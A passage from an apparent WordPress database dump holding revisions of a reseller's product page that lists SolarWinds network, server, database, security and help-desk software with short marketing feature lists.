locate network devices</li>\r\n 	<li>Map and monitor WAPs, switches, and ports</li>\r\n 	<li>Manage switch and switch port capacity</li>\r\n 	<li>Detect rogue devices and users</li>\r\n 	<li>Turn ports on and off remotely</li>\r\n 	<li>Unified IT administration dashboard</li>\r\n</ul>\r\n6.Â <strong>NetFlow Traffic Analyzer</strong>\r\n\r\n<img class=\"alignnone  wp-image-2464\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/NetFlow-Traffic-Analyzer.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nNetFlow analyzer and bandwidth monitoring software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Bandwidth monitoring</li>\r\n 	<li>Application traffic alerting</li>\r\n 	<li>Network traffic analysis</li>\r\n 	<li>Performance Analysis Dashboard</li>\r\n 	<li>CBQoS policy optimization</li>\r\n 	<li>Malicious or malformed traffic flow identification</li>\r\n</ul>\r\n7.Â <strong>VoIP and Network Quality Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2465\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VoIP-and-Network-Quality-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nVoIP monitoring software designed for deep critical call QoS metrics and WAN performance insights.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Real-time WAN monitoring</li>\r\n 	<li>Troubleshoot VoIP call quality problems</li>\r\n 	<li>Visual VoIP call path trace</li>\r\n 	<li>Cisco VoIP gateway and PRI trunk monitoring</li>\r\n 	<li>Cisco SIP trunk monitoring</li>\r\n 	<li>Simplify IP SLA setup</li>\r\n</ul>\r\n<h3>SYSTEM MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone  wp-image-2466\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor.png\" alt=\"\" width=\"389\" height=\"243\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Virtualization Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2467\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Virtualization-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nVirtual machine monitor designed to optimize performance and fix issues in minutes.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Predictive Recommendations</li>\r\n 	<li>VM Sprawl Control</li>\r\n 	<li>Comprehensive virtualization management</li>\r\n 	<li>Powerful capacity planning tools</li>\r\n 	<li>Manage across on-premise, hybrid, and cloud</li>\r\n 	<li>Visibility across the application stack</li>\r\n</ul>\r\n3.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2468\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n4. <strong>Server Configuration Monitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2469\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Configuration-Monitor.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nServer configuration and change monitoring tool that\'s built to be easy to use.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Track system and application changes</li>\r\n 	<li>Compare configuration changes over time</li>\r\n 	<li>Correlate configuration changes to performance</li>\r\n 	<li>Asset inventory</li>\r\n 	<li>Orion Platform integration</li>\r\n</ul>\r\n5.Â <strong>Application Performance Monitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2470\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Application-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nExtending Server &amp; Application Monitor with in-depth performance monitoring of your custom applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor your custom .NET applications running on Microsoft IIS</li>\r\n 	<li>Integrated with Server &amp; Application Monitor</li>\r\n 	<li>Response Time Heat Map</li>\r\n 	<li>Transaction Performance Monitoring</li>\r\n 	<li>Distributed Transaction Tracing</li>\r\n 	<li>Trace Details</li>\r\n</ul>\r\n6.Â <strong>Web Performance Monitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2471\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nWebsite monitoring software built for comprehensive web and SaaS application performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Complete performance monitoring</li>\r\n 	<li>Continuous synthetic transaction monitoring</li>\r\n 	<li>Detailed load-time metrics</li>\r\n 	<li>Monitor from multiple locations</li>\r\n 	<li>Browser-based transaction recorder</li>\r\n 	<li>Transaction recording</li>\r\n</ul>\r\n7.Â <strong>SolarWinds Backup</strong>\r\n\r\n<img class=\"alignnone  wp-image-2472\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SolarWinds-Backup.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nServer backup software designed to be modern and reliable, without the cost and complexity.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Unified, cloud-based backup service for physical and virtual servers</li>\r\n 	<li>Robust and reliable enough to handle even large machines and applications</li>\r\n 	<li>Fast backup and rapid restore with built-in compression and deduplication</li>\r\n 	<li>Simple, at-a-glance status dashboard eliminates manual checking</li>\r\n 	<li>Global, purpose-built, private cloud included</li>\r\n 	<li>Low TCO with no hidden costs</li>\r\n</ul>\r\n<h3>DATABASE MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone  wp-image-2473\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor-1.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2474\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor-1.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n<h3>IT SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Access Rights Manager</strong></li>\r\n</ol>\r\n<img class=\"alignnone  wp-image-2475\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Access-Rights-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nManage and audit access rights across your IT infrastructure.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitoring of Active Directory</li>\r\n 	<li>Auditing for Windows File Share</li>\r\n 	<li>Monitoring of Microsoft Exchange</li>\r\n 	<li>SharePoint access monitoring and management</li>\r\n 	<li>User provisioning and management</li>\r\n 	<li>User permissions analysis</li>\r\n</ul>\r\n2.Â <strong>Threat Monitor - IT Ops Edition</strong>\r\n\r\n<img class=\"alignnone  wp-image-2476\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Threat-Monitor-IT-Ops-Edition.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nMonitor, respond, and report security threats in near real time.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Continuously updated threat intelligence</li>\r\n 	<li>Security Information and Event Manager (SIEM)</li>\r\n 	<li>Log correlation</li>\r\n 	<li>Log event archive</li>\r\n 	<li>Network and Host Intrusion Detection System</li>\r\n 	<li>Highly indexed log search capabilities</li>\r\n</ul>\r\n3.Â <strong>Log &amp; Event Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2477\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Log-Event-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nSIEM tools make it easier to use event logs for security, compliance, and troubleshooting.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Integrated compliance reporting tools</li>\r\n 	<li>Event-time correlation of security events</li>\r\n 	<li>Automated threat remediation</li>\r\n 	<li>Advanced search and forensic analysis</li>\r\n 	<li>File integrity monitoring</li>\r\n 	<li>USB device monitoring</li>\r\n</ul>\r\n4.Â <strong>Serv-U File Transfer Protocol Server</strong>\r\n\r\n<img class=\"alignnone  wp-image-2478\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-File-Transfer-Protocol-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nSimple, affordable, easy-to-use FTP server software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>File transfer using FTP and FTPS</li>\r\n 	<li>Quick and easy file transfers from the web and mobile devices</li>\r\n 	<li>Transfer multiple and large files easily</li>\r\n 	<li>Simple file transfer administration and management</li>\r\n 	<li>Secure gateway helps avoid data at rest in DMZ networks</li>\r\n 	<li>Easily manage file transfer settings and permissions</li>\r\n</ul>\r\n5.Â <strong>Patch Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2479\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Patch-Manager.png\" alt=\"\" width=\"378\" height=\"286\" />\r\n\r\nPatch management software designed for quickly addressing software vulnerabilities.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Microsoft WSUS patch management</li>\r\n 	<li>Integrations with SCCM</li>\r\n 	<li>Vulnerability management</li>\r\n 	<li>Pre-built/pre-tested packages</li>\r\n 	<li>Patch compliance reports</li>\r\n 	<li>Patch status dashboard</li>\r\n</ul>\r\n6.Â <strong>Serv-U Managed File Transfer Server</strong>\r\n\r\n<img class=\"alignnone  wp-image-2480\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-Managed-File-Transfer-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nEnhance security and control over file transfers in and outside your organization.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Reliable FTP server software for secure file transfer</li>\r\n 	<li>Ad hoc file sharing to easily send and request files</li>\r\n 	<li>Anywhere, anytime file transfer from web and mobile devices</li>\r\n 	<li>Upload and download large files quickly and easily</li>\r\n 	<li>Centralized file transfer management and automation</li>\r\n 	<li>Maintain regulatory compliance</li>\r\n</ul>\r\n<h3>IT HELP DESK</h3>\r\n<ol>\r\n 	<li><strong>Web Help Desk</strong></li>\r\n</ol>\r\n<img class=\"alignnone  wp-image-2481\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Help-Desk.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nAffordable Help Desk Ticketing and Asset Management Software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automate ticketing management</li>\r\n 	<li>Centralize your knowledge management</li>\r\n 	<li>Meet your SLAs</li>\r\n 	<li>Relational ticket association to simplify project and task management</li>\r\n 	<li>Native integration with Active Directory and LDAP</li>\r\n 	<li>Measure customer satisfaction</li>\r\n</ul>\r\n2.Â <strong>Dameware Remote Support</strong>\r\n\r\n<img class=\"alignnone  wp-image-2482\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Remote-Support.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nRemote control and systems management tools in one easy-to-use package.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Fast and secure remote control</li>\r\n 	<li>Anywhere, anytime remote assistance</li>\r\n 	<li>Simplify Windows administration</li>\r\n 	<li>Built-in remote admin tools</li>\r\n 	<li>Deliver remote support from iOS and Android devices</li>\r\n 	<li>Remotely manage Active Directory environments</li>\r\n</ul>\r\n3.Â <strong>Dameware Mini Remote Control</strong>\r\n\r\n<img class=\"alignnone  wp-image-2483\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Mini-Remote-Control.png\" alt=\"\" width=\"383\" height=\"239\" />\r\n\r\nAffordable remote control software for all your customer support and help desk needs.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-platform desktop sharing and remote control</li>\r\n 	<li>Remote access to sleeping and powered-off computers</li>\r\n 	<li>Multi-factor authentication</li>\r\n 	<li>Flexible user access control</li>\r\n 	<li>Customize and automatically deploy remote control agents</li>\r\n 	<li>Remote session tools and utilities</li>\r\n</ul>\r\n4.Â <strong>Mobile Admin</strong>\r\n\r\n<img class=\"alignnone  wp-image-2484\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mobile-Admin.jpg\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nGet help simplifying IT administration and management from your mobile device.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>SolarWinds OrionÂ® Platform integration</li>\r\n 	<li>Active Directory</li>\r\n 	<li>Virtualization management</li>\r\n 	<li>Email server management</li>\r\n 	<li>Backup management</li>\r\n 	<li>Remote access</li>\r\n</ul>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Solarwinds','','inherit','closed','closed','','1597-revision-v1','','','2018-12-18 22:55:49','2018-12-18 14:55:49','',1597,'https://bintara.com.my/blog/2018/12/18/1597-revision-v1/',0,'revision','',0),(2303,1,'2018-12-17 15:37:21','2018-12-17 07:37:21','<h1>SolarWinds: We Make IT Look Easy</h1>\r\nWe are a leading provider of powerful and affordable IT infrastructure management software. Our products give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.\r\n<h2>PRODUCTS</h2>\r\n<h3>NETWORK MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Network Performance MonitorÂ </strong></li>\r\n</ol>\r\n<strong>Â <img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/network-performance-monitor/images/product-screenshots/npm-network-summary.ashx?rev=30dbffe3d5da49788143372c753ca6fb&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=0C35DCDBA69F46636D3A8D396703639BE0E11140\" alt=\"NPM Network Summary\" width=\"440\" height=\"275\" /></strong>\r\n\r\nNetwork monitoring software designed to reduce network outages and improve performance.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor network monitoring</li>\r\n 	<li>Network Insights for deeper visibility</li>\r\n 	<li>Intelligent maps</li>\r\n 	<li>NetPath and PerfStack for easy troubleshooting</li>\r\n 	<li>Smarter scalability for large environments</li>\r\n 	<li>Advanced alerting</li>\r\n</ul>\r\n2.Â <strong>Network Configuration Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/network-configuration-manager/images/product-screenshots/ncmsumconfig.ashx?rev=f92366e49573424f9ed9e8a9b5f286c3&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=BC39288C21EE23327F44C7B9F645269981382935\" width=\"440\" height=\"275\" />\r\n\r\nAutomate network configuration management and compliance, which can help save time and optimize IT resources.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Network automation</li>\r\n 	<li>Network compliance</li>\r\n 	<li>Configuration backup</li>\r\n 	<li>Vulnerability assessment</li>\r\n 	<li>Network Insights for Cisco ASA and Cisco Nexus</li>\r\n 	<li>Integration with Network Performance Monitor</li>\r\n</ul>\r\n3.Â <strong>ipMonitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/ipmonitor/images/product-screenshots/ipmon-dashboard.ashx?rev=c0bb646802a240c689f3434f61677d80&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=950B6BC118E6294B80FC08337DB432CED2B1838B\" alt=\"ipmon-dashboard\" width=\"440\" height=\"275\" />\r\n\r\nEssential up/down and performance monitoring for networks, servers, and applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor network devices, servers, and applications from one console</li>\r\n 	<li>Receive alerts for availability and performance issues</li>\r\n 	<li>Monitor network status on maps and NOC view</li>\r\n 	<li>Minimize downtime by automating remediation actions</li>\r\n 	<li>Enhance monitoring with built-in reports and dashboards</li>\r\n</ul>\r\n4.Â <strong>IP Address Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/ip-address-manager/images/product-screenshots/ipam-ddi-management.ashx?rev=f1cd2ec5ba464779a347479792ed3c5b&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=5B43D2070007092C923FD3A2D29677AF056FE3B1\" width=\"440\" height=\"275\" />\r\n\r\nIP address management software designed to save time and prevent costly errors.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automated IP address tracking</li>\r\n 	<li>Integrated DHCP, DNS, and IP address management</li>\r\n 	<li>IP address alerting, troubleshooting, and reporting</li>\r\n 	<li>Multi-vendor on-prem and cloud DHCP and DNS support</li>\r\n 	<li>IP Request Wizard for streamlining and automating IP address requests</li>\r\n 	<li>API support with CRUD operations for two-way integration with third-party software</li>\r\n</ul>\r\n5.Â <strong>User Device Tracker</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/user-device-tracker/images/product-screenshots/udt-unified-dashboard.ashx?rev=9d0980821b5945d48e78a73467c62510&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=03F8DAE8CE5FBE405DF7B6A85E7130ED5073A88B\" width=\"441\" height=\"276\" />\r\n\r\nNetwork device tracking software that can locate users and devices on your network.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Quickly locate network devices</li>\r\n 	<li>Map and monitor WAPs, switches, and ports</li>\r\n 	<li>Manage switch and switch port capacity</li>\r\n 	<li>Detect rogue devices and users</li>\r\n 	<li>Turn ports on and off remotely</li>\r\n 	<li>Unified IT administration dashboard</li>\r\n</ul>\r\n6.Â <strong>NetFlow Traffic Analyzer</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/netflow-traffic-analyzer/images/product-screenshots/nta-dashboard-summary.ashx?rev=6f287b615d33405d968b1e79425dfbbe&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=13ED53FA144619D9EF31B2B438F80D927D87D339\" width=\"438\" height=\"274\" />\r\n\r\nNetFlow analyzer and bandwidth monitoring software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Bandwidth monitoring</li>\r\n 	<li>Application traffic alerting</li>\r\n 	<li>Network traffic analysis</li>\r\n 	<li>Performance Analysis Dashboard</li>\r\n 	<li>CBQoS policy optimization</li>\r\n 	<li>Malicious or malformed traffic flow identification</li>\r\n</ul>\r\n7.Â <strong>VoIP and Network Quality Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/voip-network-quality-manager/images/product-screenshots/vnqm-monitor-wan-performance.ashx?rev=17c0648c1cfa4d64935e809a3ee7cafc&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=41DBBCE6215F58DE77A1451AE60462893159E767\" width=\"439\" height=\"274\" />\r\n\r\nVoIP monitoring software designed for deep critical call QoS metrics and WAN performance insights.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Real-time WAN monitoring</li>\r\n 	<li>Troubleshoot VoIP call quality problems</li>\r\n 	<li>Visual VoIP call path trace</li>\r\n 	<li>Cisco VoIP gateway and PRI trunk monitoring</li>\r\n 	<li>Cisco SIP trunk monitoring</li>\r\n 	<li>Simplify IP SLA setup</li>\r\n</ul>\r\n<h3>SYSTEM MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/server-application-monitor/images/product-screenshots/sam-summary.ashx?rev=ffe5187e0979451db93c5f886528fb8d&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=475DA7B823EA38302E1F5DE618A10B428426A3DC\" alt=\"SAM Summary\" width=\"438\" height=\"274\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Virtualization Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/virtualization-manager/images/product-screenshots/vman-summary-dashboard.ashx?rev=8ca19a7f25c74cf6b3f967a2afbf7444&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=44B3676C9F8470E4FF8BE103B2C68DE06F536E3D\" width=\"440\" height=\"275\" />\r\n\r\nVirtual machine monitor designed to optimize performance and fix issues in minutes.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Predictive Recommendations</li>\r\n 	<li>VM Sprawl Control</li>\r\n 	<li>Comprehensive virtualization management</li>\r\n 	<li>Powerful capacity planning tools</li>\r\n 	<li>Manage across on-premise, hybrid, and cloud</li>\r\n 	<li>Visibility across the application stack</li>\r\n</ul>\r\n3.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/storage-resource-monitor/images/product-screenshots/srm-hp-summary.ashx?rev=69334df2203e426ebca090341445b370&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=0404A83185DBF47DF74B215610C99AD16EBE72E8\" alt=\"srm-hp-summary.\" width=\"440\" height=\"275\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n4. <strong>Server Configuration Monitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/server-configuration-monitor/images/product-screenshots/scm-summary-screen.ashx?rev=b0ae278b6a404688932dd0ff890510cc&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=4967C831888FC779B6F0268A767657C12B17FA4A\" width=\"440\" height=\"275\" />\r\n\r\nServer configuration and change monitoring tool that\'s built to be easy to use.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Track system and application changes</li>\r\n 	<li>Compare configuration changes over time</li>\r\n 	<li>Correlate configuration changes to performance</li>\r\n 	<li>Asset inventory</li>\r\n 	<li>Orion Platform integration</li>\r\n</ul>\r\n5.Â <strong>Application Performance Monitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/application-performance-monitor/images/product-screenshots/apm-application-pool.ashx?rev=ada4b2846aba4ba8bf42e86a647b2fff&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=7D35D357C2E1769FF42F3B423576531EEA749070\" alt=\"APM Application Pool\" width=\"439\" height=\"274\" />\r\n\r\nExtending Server &amp; Application Monitor with in-depth performance monitoring of your custom applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor your custom .NET applications running on Microsoft IIS</li>\r\n 	<li>Integrated with Server &amp; Application Monitor</li>\r\n 	<li>Response Time Heat Map</li>\r\n 	<li>Transaction Performance Monitoring</li>\r\n 	<li>Distributed Transaction Tracing</li>\r\n 	<li>Trace Details</li>\r\n</ul>\r\n6.Â <strong>Web Performance Monitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/web-performance-monitor/images/product-screenshots/wpm-step-details.ashx?rev=1a90d95319634bfa969c26a193732dbd&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=DEB28B7F2B4004634FB4F5D40240D009C6B22B18\" alt=\"wpm step details\" width=\"439\" height=\"274\" />\r\n\r\nWebsite monitoring software built for comprehensive web and SaaS application performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Complete performance monitoring</li>\r\n 	<li>Continuous synthetic transaction monitoring</li>\r\n 	<li>Detailed load-time metrics</li>\r\n 	<li>Monitor from multiple locations</li>\r\n 	<li>Browser-based transaction recorder</li>\r\n 	<li>Transaction recording</li>\r\n</ul>\r\n7.Â <strong>SolarWinds Backup</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/backup/images/product-screenshots/bkup-services-dashboard.ashx?rev=87f9de27ecae41b88496b98082f562ca&amp;vs=2&amp;h=405&amp;w=648&amp;la=en&amp;hash=60D586BBDDA2DD671E1B9A22EDEA32DE00E3AEF5\" width=\"440\" height=\"275\" />\r\n\r\nServer backup software designed to be modern and reliable, without the cost and complexity.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Unified, cloud-based backup service for physical and virtual servers</li>\r\n 	<li>Robust and reliable enough to handle even large machines and applications</li>\r\n 	<li>Fast backup and rapid restore with built-in compression and deduplication</li>\r\n 	<li>Simple, at-a-glance status dashboard eliminates manual checking</li>\r\n 	<li>Global, purpose-built, private cloud included</li>\r\n 	<li>Low TCO with no hidden costs</li>\r\n</ul>\r\n<h3>DATABASE MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/server-application-monitor/images/product-screenshots/sam-summary.ashx?rev=ffe5187e0979451db93c5f886528fb8d&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=475DA7B823EA38302E1F5DE618A10B428426A3DC\" alt=\"SAM Summary\" width=\"440\" height=\"275\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/storage-resource-monitor/images/product-screenshots/srm-hp-summary.ashx?rev=69334df2203e426ebca090341445b370&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=0404A83185DBF47DF74B215610C99AD16EBE72E8\" alt=\"srm-hp-summary.\" width=\"440\" height=\"275\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n<h3>IT 